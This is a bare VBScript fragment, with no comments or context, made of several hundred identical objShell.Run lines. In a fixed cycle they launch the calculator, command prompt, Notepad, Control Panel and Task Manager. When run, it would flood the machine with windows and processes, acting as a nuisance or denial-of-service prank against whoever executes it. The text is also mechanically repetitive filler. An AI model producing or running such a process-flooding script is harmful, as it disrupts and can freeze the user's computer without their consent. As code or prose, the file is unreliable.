objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
